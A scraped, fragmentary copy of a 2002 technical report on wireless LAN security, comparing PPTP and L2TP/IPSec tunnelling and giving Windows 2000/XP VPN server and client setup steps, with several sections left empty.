Security in Wireless LANs

loyalsockvillemobΔίκτυα και Επικοινωνίες

27 Οκτ 2013 (πριν από 3 χρόνια και 11 μήνες)

90 εμφανίσεις





Dipl.
-
Ing. Chrsitian Ploninger









Security in

Wireless LANs



By Chrisitan Ploninger







Institute of Computer Networks

Vienna University of Technology


November 2002



Abstract




Dipl.
-
Ing. Chrsitian Ploninger


1

Network overview

1.1

Adding a WLAN to an existing Intranet Infrastructure

This scenario typically occur
s when the computer network of an organization evolves.

Installing an additional WLAN to an existing Network Infrastructure

1.1.1

Using a separate WLAN
-
to
-
Intranet Gateway (Type A)



1.1.2

Using one central Gateway (Type B)




1.2

Stand
-
alone WLAN with Intenet Connecti
vity


This scenario may take place in small organization or at home.








Dipl.
-
Ing. Chrsitian Ploninger











Dipl.
-
Ing. Chrsitian Ploninger

1.3

Tunnelling Protocols:



Point
-
to
-
Point Tunneling Protocol (PPTP
)
. PPTP allows IP, IPX, or Ne
t
BEUI
traffic to be encrypted, and then encapsulated in an IP header to be sent across

a
corporate IP internetwork or a public IP interne
t
work such as the Internet.




Layer Two Tunneling Protocol (L2TP)
. L2TP allows IP, IPX, or Ne
t
BEUI traffic
to be encrypted, and then sent over any medium that supports point
-
to
-
point
datagram delivery, such

as IP, X.25, Frame Relay, or ATM.


1.3.1

Point
-
to
-
Point Tunneling Protocol (PPTP)

PPTP is a Layer 2 protocol that encapsulates PPP frames in IP datagrams for transmission
over an IP internetwork, such as the Internet. PPTP can be used for remote access and
rout
er
-
to
-
router VPN connections. PPTP is documented in RFC 2637.

The Point
-
to
-
Point Tunneling Protocol (PPTP) uses a TCP connection for tunnel
maintenance and a modified version of Generic Routing Encapsulation (GRE) to
encapsulate PPP frames for tunneled dat
a. The payloads of the encapsulated PPP frames
can be encrypted and/or compressed. Figure 6 shows the structure of a PPTP packet
containing user data.


Figure 6. Structure of a PPTP packet containing user data


1.3.2

Layer Two Tunneling Protocol (L2TP)

L2TP is
a combination of PPTP and Layer 2 Forwarding (L2F), a technology proposed by Cisco
Systems, Inc. L2TP represents the best features of PPTP and L2F. L2TP encapsulates PPP
frames to be sent over IP, X.25, Frame Relay, or Asynchronous Transfer Mode (ATM)
netw
orks. When configured to use IP as its datagram transport, L2TP can be used as a
tunneling protocol over the Internet. L2TP is documented in RFC 2661.

L2TP over IP internetworks uses UDP and a series of L2TP messages for tunnel maintenance.
L2TP also uses
UDP to send L2TP
-
encapsulated PPP frames as the tunneled data. The
payloads of encapsulated PPP frames can be encrypted and/or compressed. Figure 7 shows
the structure of an L2TP packet containing user data.





Dipl.
-
Ing. Chrsitian Ploninger


Figure 7. Structure of an L2TP packet containi
ng user data

In Windows 2000, IPSec Encapsulating Security Payload (ESP) is used to encrypt the L2TP
packet. This is known as L2TP/IPSec. The result after applying ESP is shown in Figure 8.


Figure 8. Encryption of an L2TP packet with IPSec ESP

1.3.3

PPTP Compa
red to L2TP/IPSec

Both PPTP and L2TP/IPSec use PPP to provide an initial envelope for the data, and then
append additional headers for transport through the interne
t
work. However, there are the
following differences:



With PPTP, data encryption begins after

the PPP connection process (and, therefore, PPP
authentication) is completed. With L2TP/IPSec, data encryption begins before the PPP
connection process by negotiating an IPSec security association.



PPTP connections use MPPE, a stream cipher that is based
on the Rivest
-
Shamir
-
Aldeman
(RSA) RC
-
4 encryption algorithm and uses 40, 56, or 128
-
bit encryption keys. Stream
ciphers encrypt data as a bit stream. L2TP/IPSec connections use the Data Encryption
Standard (DES), which is a block cipher that uses either a

56
-
bit key for DES or three 56
-
bit keys for 3
-
DES. Block ciphers encrypt data in discrete blocks (64
-
bit blocks, in the case
of DES).



PPTP connections require only user
-
level authentication through a PPP
-
based
authentication protocol. L2TP/IPSec connectio
ns require the same user
-
level
authentication and, in addition, computer
-
level authentication using computer certificates.

1.3.4

Advantages of L2TP/IPSec over PPTP

The following are the advantages of using L2TP/IPSec over PPTP in Windows 2000:



IPSec provides per

packet data authentication (proof that the data was sent by the
authorized user), data integrity (proof that the data was not modified in transit), replay




Dipl.
-
Ing. Chrsitian Ploninger

protection (prevention from resending a stream of captured packets), and data
confidentiality (preve
ntion from interpreting captured packets without the encryption key).
By contrast, PPTP provides only per
-
packet data confidentiality.



L2TP/IPSec connections provide stronger authentication by requiring both computer
-
level
authentication through certificat
es and user
-
level authentication through a PPP
authentication protocol.



PPP packets exchanged during user
-
level authentication are never sent in an unencrypted
form because the PPP connection process for L2TP/IPSec occurs after the IPSec security
associati
ons (SAs) are established. If intercepted, the PPP authentication exchange for
some types of PPP authentication protocols can be used to perform offline dictionary
attacks and determine user passwords. By encrypting the PPP authentication exchange,
offline

dictionary attacks are only possible after the encrypted packets have been
successfully decrypted.

1.3.5

Advantages of PPTP over L2TP/IPSec

The following are advantages of PPTP over L2TP/IPSec in Windows 2000:



PPTP does not require a certificate infrastructure.

L2TP/IPSec requires a certificate
infrastructure for issuing computer certificates to the VPN server computer (or other
authenticating server) and all VPN client computers. (Nevertheless Windows 2000 can be
configured to use IPSec with Pre
-
Shared
-
Keys.)



P
PTP can be used by computers running Windows XP, Windows 2000, Windows NT version
4.0, Windows Millennium Edition (ME), Windows 98, and Windows 95 with the Windows
Dial
-
Up Networking 1.3 Performance & Security Update. L2TP/IPSec can only be used with
Windo
ws

XP and Windows

2000 VPN clients. Only these clients support the L2TP protocol,
IPSec, and the use of certificates. (Windows 2000 and Windows XP are state
-
of
-
the
-
art
software.)



PPTP clients and server can be placed behind a network address translator (N
AT) if the
NAT has the appropriate editors for PPTP traffic. L2TP/IPSec
-
based VPN clients or servers
cannot be placed behind a NAT because Internet Key Exchange (IKE)
(
the protocol used
to negotiate SAs
)
and IPSec
-
protected traffic are not NAT
-
translatable
. (?? This means
that the NAT service cannot be used within the tunnel (betwenn the tunnel endpoints).)






Dipl.
-
Ing. Chrsitian Ploninger

1.4

Setting up DHCP


Setup the Server

Setup the Clients





















1.5

Setting up NAT








Dipl.
-
Ing. Chrsitian Ploninger

1.6

Setting up the Tunnel

1.6.1

VPN Server Setup

Setup VPN Connection
:

With the
Virtual private network (VPN) server

option, the Routing and Remote
Access server operates in the role of a VPN server supporting both remote access and
router
-
to
-
router VPN connections. To configure a Windows 2000 VPN remote access
server using

the
Virtual private network (VPN) server

option in the Routing and
Remote Access Server Setup Wizard, perform the following:


1.

Click
Start
, point to
Programs
, point to
Administrative Tools
, and then click
Routing and Remote Access
.

2.

Right
-
click your server
name, and then click
Configure and Enable Routing and
Remote Access
.

3.

In the
Welcome to the Routing and Remote Access Server Setup Wizard

dialog
box, click
Next
.

4.

In the
Common Configurations

dialog box, click
Remote access server

and then
click
Next
.

5.

In the

Remote Client Protocols

dialog box, verify that all data protocols used by
your VPN clients are present, and then click
Next
. (Ordinary this will include TCP/IP)

6.

In
Internet Connection
, click the connection that corresponds to the interface
connected to y
our Wireless LAN, and then click
Next
.
You will only see the
Internet
Connection

dialog box if you have more than one LAN connection.


7.

In the
Network Selection

dialog box, click the connection that corresponds to the
connection connected to your intranet,
and then click
Next
.
You will only see the
Network Selection

dialog box if you have more than two LAN connections.



8.

In the
IP Address Assignment

dialog box, click
Automatic

if the remote access
server should use DHCP to obtain IP addresses for VPN clients
. Otherwise, click
From
a specified range of addresses

and configure one or more static ranges of
addresses. Click
Next
.

9.

In the
Managing Multiple Remote Access Servers

dialog box, click
No, I don't
want to set up this server to use RADIUS now
, and then cli
ck
Next
.

10.

In the
Completing the Routing and Remote Access Server Setup Wizard

dialog
box, click
Finish
.

11.

Start the Routing and Remote Access service when prompted.






















Dipl.
-
Ing. Chrsitian Ploninger

Add VPN User:


Add a new local user called “VPN” to the VPN Server. Configur
e the dial
-
in option to grant
access according to RAS. Per default this option is set. Because of this, chakch all other
users and deactivate the dial
-
in permission is neccecary.


Configure IPSec:



Secure VPN Connection:





1.6.2

VPN Client Setup




Setup VPN
Connection:

If you have a small number of VPN remote access clients, you can manually configure
VPN connections for each client. For Windows XP VPN clients, use the following
instructions to create the VPN connection:


1.

Click
Start
, click
Control Panel
, cli
ck
Network and Internet Connections
, and
then click
Network Connections
.

2.

Under
Network Tasks
, click
Create a new connection
, and then click
Next
.

3.

Click
Connect to the network at my workplace
, and then click
Next
.

4.

Click
Virtual Private Network connection
,

and then click
Next
.

5.

Type the name of the VPN connection, and then click
Next
.

6.

Click
Do not dial the initial connection
.
Click
Next
.

7.

Type the IP address of the VPN server, and then click
Next
.

8.

Click
Anyone's use

if you want this VPN connection to be avail
able to all users who
log on to this computer.
Otherwise, click
My use only
. Click
Next
.
You will only see
this choice if the computer is a member of a domain.

9.

Click
Add a shortcut to my desktop
.
Click
Finish
.



In the
Connect

dialog box, type the user nam
e and password that will be sent as your
security credentials when you connect.
If you want to save the password so that it does
not have to be typed for each connection attempt, click
Save this user name and
password for the following users
.

To make a VPN

connection, click
Connect
.

To create a VPN connection on a computer running Windows 2000, double
-
click the
Make New Connection

icon in the Network Connections folder and select the
Connect
to a private network through the Internet

connection type.




Con
figure IPSec:



Secure VPN Connection:






Dipl.
-
Ing. Chrsitian Ploninger